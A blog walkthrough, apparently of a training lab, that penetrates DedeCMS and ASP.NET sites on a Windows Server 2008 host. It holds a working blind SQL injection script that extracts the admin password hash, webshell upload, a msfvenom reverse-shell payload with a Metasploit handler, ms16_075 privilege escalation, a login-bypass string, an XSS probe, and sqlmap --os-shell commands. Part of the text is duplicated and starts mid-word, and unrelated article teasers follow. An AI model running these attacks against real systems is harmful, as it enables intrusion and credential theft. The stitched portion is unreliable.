项目4渗透全过程

news2024/11/26 10:01:19

网络拓扑图

任务从拓扑图中可以其中一台web服务器可以进行与kali的直接通信。该web服务器是双重网段。也就是拿到该服务器就可以在进行下一步内网操作了。

image-20230712094701896

2008配置:

image-20230712150025827

image-20230712154114040

护卫神主机系统密码:!@#Qwe123.

sqlserver2008密码:!@#a123…

一、信息收集

扫描本地主机:

nmap -sn 192.168.31.0/24
netdiscover -i eth0 -r 192.168.31.0/24

image-20230712161222461

访问尝试得出192.168.31.210为网站服务器地址。

image-20230712161305712

扫描端口:

masscan -p 1-65535 192.168.31.210 --rate=1000
扫描单个主机上的特定端口:

nmap -p <端口号> <主机IP>

nmap -p 1-65535 192.168.31.21

得出简单结果如下:

Discovered open port 3389/tcp on 192.168.31.210                                
Discovered open port 80/tcp on 192.168.31.210                                  
Discovered open port 999/tcp on 192.168.31.210                                 
Discovered open port 49154/tcp on 192.168.31.210                               
Discovered open port 21/tcp on 192.168.31.210                                  
Discovered open port 49155/tcp on 192.168.31.210                               
Discovered open port 6588/tcp on 192.168.31.210                                
Discovered open port 135/tcp on 192.168.31.210                                 
Discovered open port 10129/tcp on 192.168.31.210                               
Discovered open port 53/tcp on 192.168.31.210  

获取端口内详细信息

扫描一个主机的所有TCP端口

nmap -sC <主机IP> 
进行操作系统检测和版本检测

nmap -A

最后:

nmap -sC -A 192.168.31.210 -p 3389,80,999,49154,21,49155,6588,135,10129,53
Starting Nmap 7.93 ( https://nmap.org ) at 2023-07-12 04:28 EDT
Nmap scan report for WIN-KALKEMT3JMA (192.168.31.210)
Host is up (0.00033s latency).

PORT      STATE SERVICE    VERSION
21/tcp    open  ftp        Microsoft ftpd
| ftp-syst: 
|_  SYST: Windows_NT
53/tcp    open  domain     Microsoft DNS 6.1.7601 (1DB1446A) (Windows Server 2008 R2 SP1)
| dns-nsid: 
|_  bind.version: Microsoft DNS 6.1.7601 (1DB1446A)
80/tcp    open  http       Microsoft IIS httpd 7.5
|_http-server-header: Microsoft-IIS/7.5
|_http-title: IIS7
| http-methods: 
|_  Potentially risky methods: TRACE
135/tcp   open  msrpc      Microsoft Windows RPC
999/tcp   open  http       Microsoft IIS httpd 7.5
|_http-server-header: Microsoft-IIS/7.5
| http-methods: 
|_  Potentially risky methods: TRACE
|_http-title: phpMyAdmin
| http-robots.txt: 1 disallowed entry 
|_/
3389/tcp  open  tcpwrapped
|_ssl-date: 2023-07-12T08:30:25+00:00; -1s from scanner time.
| ssl-cert: Subject: commonName=WIN-KALKEMT3JMA
| Not valid before: 2023-07-11T07:30:52
|_Not valid after:  2024-01-10T07:30:52
| rdp-ntlm-info: 
|   Target_Name: WIN-KALKEMT3JMA
|   NetBIOS_Domain_Name: WIN-KALKEMT3JMA
|   NetBIOS_Computer_Name: WIN-KALKEMT3JMA
|   DNS_Domain_Name: WIN-KALKEMT3JMA
|   DNS_Computer_Name: WIN-KALKEMT3JMA
|   Product_Version: 6.1.7601
|_  System_Time: 2023-07-12T08:30:11+00:00
6588/tcp  open  http       Microsoft IIS httpd 7.5
|_http-server-header: Microsoft-IIS/7.5
| http-cookie-flags: 
|   /: 
|     ASPSESSIONIDSACBQABT: 
|_      httponly flag not set
|_http-title: \xBB\xA4\xCE\xC0\xC9\xF1\xA1\xA4\xD6\xF7\xBB\xFA\xB4\xF3\xCA\xA6 V3.5.1 - \xC7\xB0\xCC\xA8\xB5\xC7\xC2\xBC
| http-methods: 
|_  Potentially risky methods: TRACE
10129/tcp open  bmc-gms?
49154/tcp open  msrpc      Microsoft Windows RPC
49155/tcp open  msrpc      Microsoft Windows RPC
MAC Address: 00:0C:29:71:98:AF (VMware)
Warning: OSScan results may be unreliable because we could not find at least 1 open and 1 closed port
OS details: Microsoft Windows Server 2008 or 2008 Beta 3, Microsoft Windows Server 2008 R2 or Windows 8.1, Microsoft Windows 7 Professional or Windows 8, Microsoft Windows Embedded Standard 7, Microsoft Windows Phone 7.5 or 8.0, Microsoft Windows Vista SP0 or SP1, Windows Server 2008 SP1, or Windows 7, Microsoft Windows Vista SP2, Windows 7 SP1, or Windows Server 2008
Network Distance: 1 hop
Service Info: OS: Windows; CPE: cpe:/o:microsoft:windows, cpe:/o:microsoft:windows_server_2008:r2:sp1

Host script results:
|_clock-skew: mean: -1s, deviation: 0s, median: -1s

TRACEROUTE
HOP RTT     ADDRESS
1   0.33 ms WIN-KALKEMT3JMA (192.168.31.210)

OS and Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
Nmap done: 1 IP address (1 host up) scanned in 138.94 seconds

登录页面

端口999

image-20230712170013566

端口6588

image-20230712170102342

子域名收集

new.cc123.com

ww2.cc123.com

www.cc123.com

cms收集

工具:kali

cmseek - u url

new.cc123.com采用cms如下:

image-20230713113920921

image-20230713114008204

爆出cms下的版本号

工具:7kbscan

搜索得到一些路径

http://new.cc123.com/data/admin/ver.txt

image-20230713151155060

得出版本为20210618,搜索相关漏洞

后台地址:

new.cc123.com/dede/

image-20230713151321418

new.cc123.com/member 注册一个登入

image-20230713151346597

二、new域名下的cms利用漏洞

1.获取后台密码

利用地址

Dedecms 20150618 注入漏洞(可注入管理员账户) - 开水网络 (hekaiyu.cn)

百度搜索 20150618 存在注入(主要原因是变量$key没有进行过滤) 添加分类并抓取cookie值

在分类管理中添加分类,抓取cookie

抓取自己的cookie:
PHPSESSID=1m7rcqv6gd432cp6vgdv6c56f2; DedeUserID=4; DedeUserID__ckMd5=f02b1d395cb070ca; DedeLoginTime=1689232703; DedeLoginTime__ckMd5=afc1645bc6b103c3

image-20230713152347393

得到的cookie 替换下面exp脚本中的cookie

import sys,os
import urllib2
import time
opener = urllib2.build_opener()

opener.addheaders.append(('Cookie', 'PHPSESSID=1m7rcqv6gd432cp6vgdv6c56f2; DedeUserID=4; DedeUserID__ckMd5=f02b1d395cb070ca; DedeLoginTime=1689232703; DedeLoginTime__ckMd5=afc1645bc6b103c3 last_vtime=1449818368; last_vtime__ckMd5=a8cc9e405d9da0bd; last_vid=tmdsb; last_vid__ckMd5=c6de842f1764c614'))
payloads = 'abcdefghijklmnopqrstuvwxyz0123456789@_.'
name = ""
 
for i in range(1,21):
 
    for p in payloads:
 
        s1 = "%s" %(i)
        s2 = "%s" %(ord(p))
 
        s = "http://localhost/d2/member/mtypes.php?dopost=save&_FILES[mtypename][name]=.xxxx&_FILES[mtypename][type]=xxxxx&_FILES[mtypename][tmp_name][a'%20and%20`'`.``.mtypeid%20or%20if(ascii(substr((select%20pwd%20from%20dede_admin%20limit%201),"+s1+",1))%3d"+s2+",sleep(3),0)%20and%20mtypeid%3d1%23]=w&_FILES[mtypename][size]=.xxxx"
 
        start_time = time.time()
 
        try:
 
            req = urllib2.Request(s)
                        
            req_data=opener.open(req,timeout=10)
 
            if time.time() - start_time > 2.0:
 
                name = name+p
 
                print name+'.....'
 
        except urllib2.URLError,e:
 
             break
 
print 'password is %s'  % name

该代码片段是一个Python脚本,它通过发送HTTP请求来进行漏洞攻击。代码的作用是使用盲注(Blind SQL Injection)技术尝试猜解指定URL中的密码。

代码中使用了一个嵌套的循环结构。外层循环遍历1到20的数字,内层循环遍历payloads列表中的每个字符。在每次循环中,根据当前外层循环和内层循环的索引构造一个特定的HTTP请求URL,该URL中包含注入攻击的payload。代码通过检测HTTP请求的响应时间来判断是否成功猜解密码。

如果某个payload导致响应时间超过2秒,表示猜测的字符正确,并将其添加到name变量中。最终,脚本输出猜解的密码。

得出一个MD5 值,解密后获得密码admin7788.

2.通过后台功能上传马:

在后台看到文件式管理器中可以进行上传文件,并没有进行后台的拦截,直接上传文件马成功。

image-20230718170930260

3.通过msf得到反弹shell

1、生成exe模块

msfvenom  -p  windows/meterpreter/reverse_tcp lhost=(kali的ip) lport=(自定义端口) -f exe >(文件名称).exe

2、通过webshell上传生成的exe监听程序

上传到 C:\windows\debug\WIA\sb.exe

image-20230718174335816

3、kali进入msf模块开启监听

use exploit/multi/handler  使用监听模块
set payload windows/meterpreter/reverse_tcp 设置tcp监听攻击载荷
set lhost 0.0.0.0 设置攻击者ip,这里直接0.0.0.0就行,表示什么都接收
输入set lport 5544 设置攻击者监听ip,与木马绑定的一致5544
run 运行

image-20230718174927556

4、webshell中运行cmd命令执行刚刚的程序马

路径\*.exe

image-20230721164559711

获取回复会话,使用getuid 查看当前用户是否为网站管理员

image-20230718175104908

可以看到为普通权限

返回 msf,得到session

background

image-20230719092824105

4.利用msf的exp提权

搜索提权的exp

search  ms16

这次使用ms16_075_reflection_juicy 漏洞编号

image-20230718175729991

use exploit/windows/local/ms16_075_reflection_juicy

相关配置

show options

配置完成后如下

image-20230718175933374

设置好session为刚刚的监听

set session 2

运行提权成功

三、 ww2域名渗透

1.目录扫描出后台:

image-20230719094937943

image-20230719095115557

image-20230719142018947

或者使用kali下的扫描工具: gobuster

使用命令

gobuster  dir -u http://ww2.cc123.com -w /usr/share/wordlists/dirbuster/directory-list-2.3-medium.txt  -x 'aspx,html' -o cc123



-w 指定字典
-o 保存的路径

扫描结果

[外链图片转存失败,源站可能有防盗链机制,建议将图片保存下来直接上传(img-J6H2YnlT-1690010332874)(C:\Users\Administrator\AppData\Roaming\Typora\typora-user-images\image-20230719105852743.png)]

安装教程

01—安装go

a.下载go1.8.3安装包

wget -c https://storage.googleapis.com/golang/go1.8.3.linux-amd64.tar.gz
b.解压缩,并复制到/usr/local中

sudo cp -r go /usr/local
c.添加环境变量

vim /etc/profile 
export PATH=$PATH:/usr/local/go/bin
:wq 
在kali账号下无法保存,因此考虑切换root,不知道root密码,先修改密码再登陆。

d.切换root


d.使环境变量立即生效

source /etc/profile 

e. 查看版本
go version

02—安装gobuster
a.安装
apt update  
apt install gobuster
先更新apt,再安装可以成功。

得到后台

image-20230719105952788

2.获取密码

方法一 、密码爆破

通过burp重放功能,发包发现得到回显,可以判断出短信存在可以重复利用。

因此可以进行密码爆破。

image-20230719113030165

密码 cc123

方法二、测试存在sql注入

&username=admin'--+

加上闭合后发包,返回302,判断可能存在注入

判断他的查询语句应该如下:

select * from users where username='admin' and password='123' 

image-20230719113231833

闭合绕过密码验证

select * from users where username='admin''--

image-20230719114251791

成功进入后台

image-20230719114309605

3.XSS后台注入漏洞

根據剛剛掃描的路徑,进入网站

提交页面,尝试提交xss,回刚才的管理员页面看看会不会存在弹框

image-20230719142046858

写入

<script>alter(1);</script>

image-20230719143334800

进入后台

image-20230719143617483

发现弹窗:存在XSS注入

image-20230719144123854

4.后台sql注入

http://ww2.cc123.com/admin/Login.aspx登录后

浏览后台 在新闻咨询管理处,提交可以上传到后台,

点击修改抓包发现存在id值

image-20230719153944246

image-20230719153538396

复制流量包到sqlmap尝试注入

 vim /home/kali/桌面/sql.txt

(1)爆出数据库

sqlmap -r sql.txt --dbms mssql -v 1 --batch --dbs

image-20230719154252383

(2)爆出当前用户及当前数据库

sqlmap -r sql.txt --dbms mssql -v 1 --batch --current-db --current-user

看到当前用户为sa,数据库为grcms_data

image-20230719154601877

(3) 爆出当前数据库的表名

sqlmap -u http://www.ybxjy.com/dsideal_yy/getNoticeRegisterId?type=zygh --dbms mssql -v 1 -D UnKnow --tables

sqlmap -r sql.txt --dbms mssql -v 1 -D grcms_data --tables

image-20230719155005965

(4)爆出表中的内容

sqlmap -r sql.txt --dbms mssql -v 1 -D grcms_data -T admin --dump

判断为加密:

image-20230719161102792

(5)获取getshell,数据库权限

sqlmap -r sql_test.txt --dbms mssql -v 1 --os-shell

得到数据库shell权限

image-20230719161019991

执行netstat -ano 收集端口

发现还有另外一个网段的ip,猜测还有多一层网络

image-20230719162214671

分析内网域结构

结论:从搜集到的 服务器IP信息 和 初始靶机 不一致,推算目标为站库分离结构,含至少两台服务器。

站库分离:(程序跟数据库不在一个服务器 让这个数据服务器更加的安全 数据更加安全)

5.返回new下web下cmd权限,获取代码

1.切换到代码下的目录

cd C:\HwsHostMaster\wwwroot

image-20230719172916917

2.下载文件

执行命令,这里使用/,不然会报错

download C:/HwsHostMaster/wwwroot/ww2cc123_55m39g/web/bin

image-20230721165830627

下载出来的为dll原文件

使用 ILSPY进行反编译处理,获得代码

image-20230721173723423

6.编辑器漏洞

ap -r sql_test.txt --dbms mssql -v 1 --os-shell


得到数据库shell权限

[外链图片转存中...(img-i8nd0kMW-1690010332880)]



执行netstat -ano 收集端口 

发现还有另外一个网段的ip,猜测还有多一层网络

[外链图片转存中...(img-MFEI1KP6-1690010332881)]



分析内网域结构

结论:从搜集到的 服务器IP信息 和 初始靶机 不一致,推算目标为站库分离结构,含至少两台服务器。

站库分离:(程序跟数据库不在一个服务器 让这个数据服务器更加的安全 数据更加安全)



### 5.返回new下web下cmd权限,获取代码

1.切换到代码下的目录

cd C:\HwsHostMaster\wwwroot


[外链图片转存中...(img-zXMroKiS-1690010332881)]

2.下载文件

执行命令,这里使用/,不然会报错

download C:/HwsHostMaster/wwwroot/ww2cc123_55m39g/web/bin


[外链图片转存中...(img-387iuqz4-1690010332881)]

下载出来的为dll原文件

使用 ILSPY进行反编译处理,获得代码

[外链图片转存中...(img-zk3BvVTV-1690010332882)]





### 6.编辑器漏洞

![image-20230721175758515](https://img-blog.csdnimg.cn/img_convert/54617bb27ee4c6f15c59e59db593bbd8.png)

本文来自互联网用户投稿,该文观点仅代表作者本人,不代表本站立场。本站仅提供信息存储空间服务,不拥有所有权,不承担相关法律责任。如若转载,请注明出处:http://www.coloradmin.cn/o/782249.html

如若内容造成侵权/违法违规/事实不符,请联系多彩编程网进行投诉反馈,一经查实,立即删除!

相关文章

遥感目标检测(3)-DAL(Dynamic Anchor Learning for Object Detection)

目录 一、概述 二、背景 三、建议 1、旋转RetinaNet 2、动态锚框分布 3、匹配敏感损失 四、实验 一、概述 由于选择正样本锚框进行回归&#xff0c;不一定能够定位真实的GT&#xff0c;而部分负样本回归甚至可以回归到真实的GT&#xff0c;说明相当多的负样本锚框有着准…

FreeRTOS 初识

从这节开始学习FreeRTOS操作系统。 FreeRTOS 介绍 Q: 什么是 FreeRTOS &#xff1f; A: Free即免费的&#xff0c;RTOS的全称是Real time operating system&#xff0c;中文就是实时操作系统。 注意&#xff1a;RTOS不是指某一个确定的系统&#xff0c;而是指一类操作系统。比…

【Java 并发编程】读写锁 ReentrantReadWriteLock StampLock 详解

读写锁 ReentrantReadWriteLock & StampLock 详解 1. 读写锁1.1 并发场景1.2 什么是读写锁1.3 思考如何自己实现一把锁&#xff1f; 2. ReentrantReadWriteLock2.1 ReentrantReadWriteLock 概述及其基本结构2.2 ReentrantReadWriteLock 的特点2.2.1 读写锁的互斥关系2.2.2 …

springboot实现qq邮箱发送邮件或者验证码

首先我先去qq邮箱或者网易邮箱开通POP3/IMAP/SMTP/Exchange/CardDAV 服务 它在左上角的设置——账户——往下滑就可以找到——然后点击开通 开通后就会得到一串授权码。如下图 接下来直接编写代码 首先我没导入依赖 <!-- 这个是邮箱验证--> <dependency> <group…

IDEA+java+spring+hibernate+jquery+mysql后台管理系统

IDEA javaspringhibernatejquerymysql后台管理系统 一、系统介绍1.环境配置 二、系统展示1. 管理员登录2.修改密码3.我的内容4.我的操作日志5. 我的登陆日志6. 我的登陆授权7. 内容管理8.标签管理9. 搜索词管理10.分类管理11.分类类型12.标签分类13.用户管理14.部门管理15.角色…

elasticsearch在统计存储用量方面的应用

存储介绍 对象存储在现在的项目中应用非常广泛&#xff0c;主要用来存储图片、视频、音频、文件等静态资源&#xff0c;所有云服务厂商基本上都有对象存储&#xff0c;对象存储收费一般 按每月每GB收费&#xff0c;如七牛的0.098 元/GB/月&#xff0c;阿里的0.12元/GB/月。比如…

k8s网络之(一)如何调试容器网络 nsenter

① 背景 ② 三种解决策略 最常见&#xff1a; 镜像为了保持精简化,没有安装网络命令,缺少必要的基础网络软件 ③ pod_id和container_id关系 细节&#xff1a; 一个pod内可以有多个容器,意味者可以有多个容器id说明&#xff1a; docker ps 默认容器id只有前12位案例&#x…

如何理解自动化

目录 1.如何定义自动化 2.自动化给人类带来的福利 3.如何学习自动化 4.自动化潜在的危害 1.如何定义自动化 自动化是指利用计算机、机械、电子技术和控制系统等现代科学技术手段&#xff0c;对各种工业、商业、农业和日常生活中的操作和过程进行自动控制和执行的过程。它旨在…

《博客继续更新说明》

目录 1.博客停更原因2.考研和比赛3.工作和博客题外话 1.博客停更原因 自2022.6.20起&#xff0c;本人CSDN博客断更了&#xff0c;故很多粉丝的私信没有看到&#xff0c;非常抱歉哈&#xff0c;简单叙说下这一年经历&#xff0c;当时大三后期原本想法是直接找嵌入式实习的&#…

怎样用IDEA社区版以及企业版创建spring boot项目?

Spring 的诞生是为了简化 Java 程序的开发的&#xff0c;而 Spring Boot 的诞生是为了简化 Spring 程序开发的 。 Spring Boot 翻译一下就是 Spring 脚手架&#xff0c;什么是脚手架呢&#xff1f;如下图所示&#xff1a; 盖房子的这个架子就是脚手架&#xff0c;脚手架…

脑电信号处理与特征提取——三. 脑电实验设计的原理与实例(古若雷)

三、脑电实验设计的原理与实例 被试间设计的实验结果也有可能是人员不同造成的&#xff0c;所以建议被试内设计。

【力扣每日一题】2023.7.22 柠檬水找零

目录 题目&#xff1a; 示例&#xff1a; 分析&#xff1a; 代码运行结果&#xff1a; 题目&#xff1a; 示例&#xff1a; 分析&#xff1a; 这是一道模拟题&#xff0c;我们贩卖五美元&#xff08;忒贵了&#xff09;一杯的柠檬水&#xff0c;然后只收取5,10,20面值的钞票…

API自动化测试总结

目录 Jmeter是怎么做API自动化测试的&#xff1f; Jmeter中动态参数的处理&#xff1f; 怎么判断前端问题还是后端问题&#xff1f; 详细描述下使用postman是怎么做API的测试的&#xff1f; 资料获取方法 Jmeter是怎么做API自动化测试的&#xff1f; 1、首先在JMeter里面…

57. 插入区间

题目链接&#xff1a;&#xff1a;力扣 解题思路&#xff0c;因为只插入一个新的区间&#xff0c;所以只需要找到插入的新区见的位置即可&#xff0c;如果与来的区间重叠&#xff0c;则进行合并&#xff0c; 两个区间重叠需要判断的情况比较多&#xff0c;可以判断两个区间不重…

已解决-使用Adobe Acrobat去除PDF水印

这个方法只能去带颜色的水印&#xff0c;灰色的去不了&#xff0c;等我有空时候&#xff0c;再写一篇使用PS去除水印的方法&#xff0c;也非常简单。敬请期待 安装软件 网上下载安装Adobe Acrobat Pro DC 安装Adobe PDF打印机 点击“添加打印机” 选择“我的打印机未列出”…

VCL界面组件DevExpress VCL v23.1 - 全新的Windows 11主题

DevExpress VCL是Devexpress公司旗下最老牌的用户界面套包&#xff0c;所包含的控件有&#xff1a;数据录入、图表、数据分析、导航、布局等。该控件能帮助您创建优异的用户体验&#xff0c;提供高影响力的业务解决方案&#xff0c;并利用您现有的VCL技能为未来构建下一代应用程…

RT-Thread qemu mps2-an385 bsp 移植制作 :环境搭建篇

前言 最近打算系统地研究一下 RT-Thread&#xff0c;包括 RT-Thread BSP 的移植&#xff0c;由于一直在使用 QEMU 进行一些软件功能的验证&#xff0c;qemu 支持很多的CPU 与 开发板&#xff0c;所以想移植一个新的 qemu board 到 RT-Thread&#xff0c;掌握BSP 移植的方法 当…

pytest配置文件:pytest.ini

1. 开始 pytest配置文件可以改变pytest的默认运行方式&#xff0c;它是一个固定的文件名称pytest.ini。 pytest.ini存放路径为项目的根路径。 2. 使用addopts-追加默认参数 我们每次在命令行中执行pytest命令时&#xff0c;如果参数是固定的&#xff0c;可以在pytest.ini进…

OpenCV:图像直方图计算

图像直方图为图像中像素强度的分布提供了有价值的见解。通过了解直方图&#xff0c;你可以获得有关图像对比度、亮度和整体色调分布的信息。这些知识对于图像增强、图像分割和特征提取等任务非常有用。 本文旨在为学习如何使用 OpenCV 执行图像直方图计算提供清晰且全面的指南。…

【Java基础教程】(四十三)多线程篇 · 下:深入剖析Java多线程编程:同步、死锁及经典案例——生产者与消费者,探究sleep()与wait()的差异

Java基础教程之多线程 下 &#x1f539;本节学习目标1️⃣ 线程的同步与死锁1.1 同步问题的引出2.2 synchronized 同步操作2.3 死锁 2️⃣ 多线程经典案例——生产者与消费者&#x1f50d;分析sleep()和wait()的区别&#xff1f; &#x1f33e; 总结 &#x1f539;本节学习目标…